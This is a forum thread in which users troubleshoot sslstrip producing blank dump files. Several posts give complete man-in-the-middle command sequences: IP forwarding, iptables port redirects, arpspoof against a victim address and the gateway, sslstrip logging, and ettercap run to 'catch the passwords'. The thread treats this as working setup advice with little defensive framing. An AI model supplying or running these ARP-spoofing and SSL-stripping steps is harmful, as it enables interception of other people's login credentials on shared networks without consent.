Results 1 to 7 of 7

Thread: Sslstrip's dump files are blank?

  1. #1
    Member Israel213's Avatar
    Join Date
    Apr 2008
    Posts
    65

    Default Sslstrip's dump files are blank?

    I've been trying to run sslstrip and have followed tutorials step-by-step and come back with the same results - Dump files that are blank. I've tried taking out the mitm steps too, to simplify the attack against my own machine and still have the same problem.

    This seems self-explanatory:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    cd /pentest/spoofing/sslstrip
    python sslstrip.py -w dumpfile
    I've ran nmap to ensure that sslstrip was running on 10000
    Code:
    10000/tcp open  snet-sensor-mgmt
    It even saves a dumpfile, but after logging in and out of sites I hit Ctrl+C to close sslstrip, open the dump file I saved with either cat or a text editor and there is absolutely nothing inside the file?

  2. #2
    Member dustyboner's Avatar
    Join Date
    Jan 2010
    Posts
    98

    Default Re: Sslstrip's dump files are blank?

    you forgot to start arpspoof
    should be something like:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    arpspoof -i wlan0 -t 192.168.0.100 192.168.0.1
    Code:
    sslstrip -w dumpfile
    Last edited by dustyboner; 07-07-2010 at 06:39 AM.

  3. #3
    Member Israel213's Avatar
    Join Date
    Apr 2008
    Posts
    65

    Default Re: Sslstrip's dump files are blank?

    I've tried that too and got the same results. As I stated, I was just trying to simplify the attack since it wasn't working and just sniff my own traffic. But I get blank dump files with arpspoof too.

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Sslstrip's dump files are blank?

    Setup netcat listening on 10000 and see if you get traffic. I don't think you're actually sending anything to sslstrip.

    I personally haven't had a need to play with sslstrip yet. It seems strange to me that all the examples redirect port 80 traffic to 10000 since port 80 will generally be HTTP not HTTPS (like 99.9999999999% of the time). Which makes me think, to SSL no strip.
    Perhaps I'm simply missing a step or detail but that's my 2 cents, feel free to mock me....

    Edit: Shouldn't it be that you're listening for requests destined for 443 (not 80), sslstip them and server them back to the user via http on 10000?
    Last edited by thorin; 07-07-2010 at 05:08 PM.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    Member dustyboner's Avatar
    Join Date
    Jan 2010
    Posts
    98

    Default Re: Sslstrip's dump files are blank?

    I have no problems with sslstrip when it is set to port 80. i usually redirect to 8080 though. I also use ettercap to catch the passwords and such

    example:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
    arpspoof -i wlan0 -t 192.168.0.64 192.168.0.1
    
    sslstrip -a -k -f -l 8080 -w stripped
    
    ettercap -T -q -i wlan0

  6. #6
    Member Israel213's Avatar
    Join Date
    Apr 2008
    Posts
    65

    Default Re: Sslstrip's dump files are blank?

    Hmmm... I just tried running with the commands DustyBoner gave and got some errors?
    Code:
    # python sslstrip.py -a -k -f -l 8080 -w stripped
    Traceback (most recent call last):
      File "sslstrip.py", line 254, in <module>
        main(sys.argv[1:])
      File "sslstrip.py", line 246, in main
        server = ThreadingHTTPServer(('', listenPort), StripProxy)
      File "/usr/lib/python2.5/SocketServer.py", line 330, in __init__
        self.server_bind()
      File "/usr/lib/python2.5/BaseHTTPServer.py", line 101, in server_bind
        SocketServer.TCPServer.server_bind(self)
      File "/usr/lib/python2.5/SocketServer.py", line 341, in server_bind
        self.socket.bind(self.server_address)
      File "<string>", line 1, in bind
    TypeError: an integer is required
    I seemed to narrow this down to the -l switch. I guess I never got this before because I was just using the default port. I don't have any broken packages. Know what this means?

  7. #7
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: Sslstrip's dump files are blank?

    Quote Originally Posted by thorin View Post
    Setup netcat listening on 10000 and see if you get traffic. I don't think you're actually sending anything to sslstrip.

    I personally haven't had a need to play with sslstrip yet. It seems strange to me that all the examples redirect port 80 traffic to 10000 since port 80 will generally be HTTP not HTTPS (like 99.9999999999% of the time). Which makes me think, to SSL no strip.
    Perhaps I'm simply missing a step or detail but that's my 2 cents, feel free to mock me....

    Edit: Shouldn't it be that you're listening for requests destined for 443 (not 80), sslstip them and server them back to the user via http on 10000?


    Of coarse you are right Thorin, I think it just makes routing easier to send all traffic to 1 port and considering the majority of a victims traffic would be http I guess sllstrip creators used 80 as to keep the session as fast as possible?, further more perhaps sslstrip intercepts credientals over http aswell.
    Last edited by killadaninja; 07-09-2010 at 06:55 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

Similar Threads

  1. I've burned bt4-final.iso but i've got a blank dvd
    By catalunya in forum Beginners Forum
    Replies: 5
    Last Post: 05-30-2010, 08:17 PM
  2. Blank screen
    By Upsman in forum OLD BT3final Support
    Replies: 2
    Last Post: 10-15-2008, 08:19 AM
  3. kismet dump files
    By thucar in forum OLD Newbie Area
    Replies: 4
    Last Post: 08-27-2008, 07:22 AM
  4. I've tried everything...Blank Screen...need help please
    By leadwings in forum OLD Newbie Area
    Replies: 5
    Last Post: 03-19-2008, 09:24 AM
  5. Nothing happens (Blank screen)
    By sin_gage in forum OLD Newbie Area
    Replies: 7
    Last Post: 11-03-2007, 02:10 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •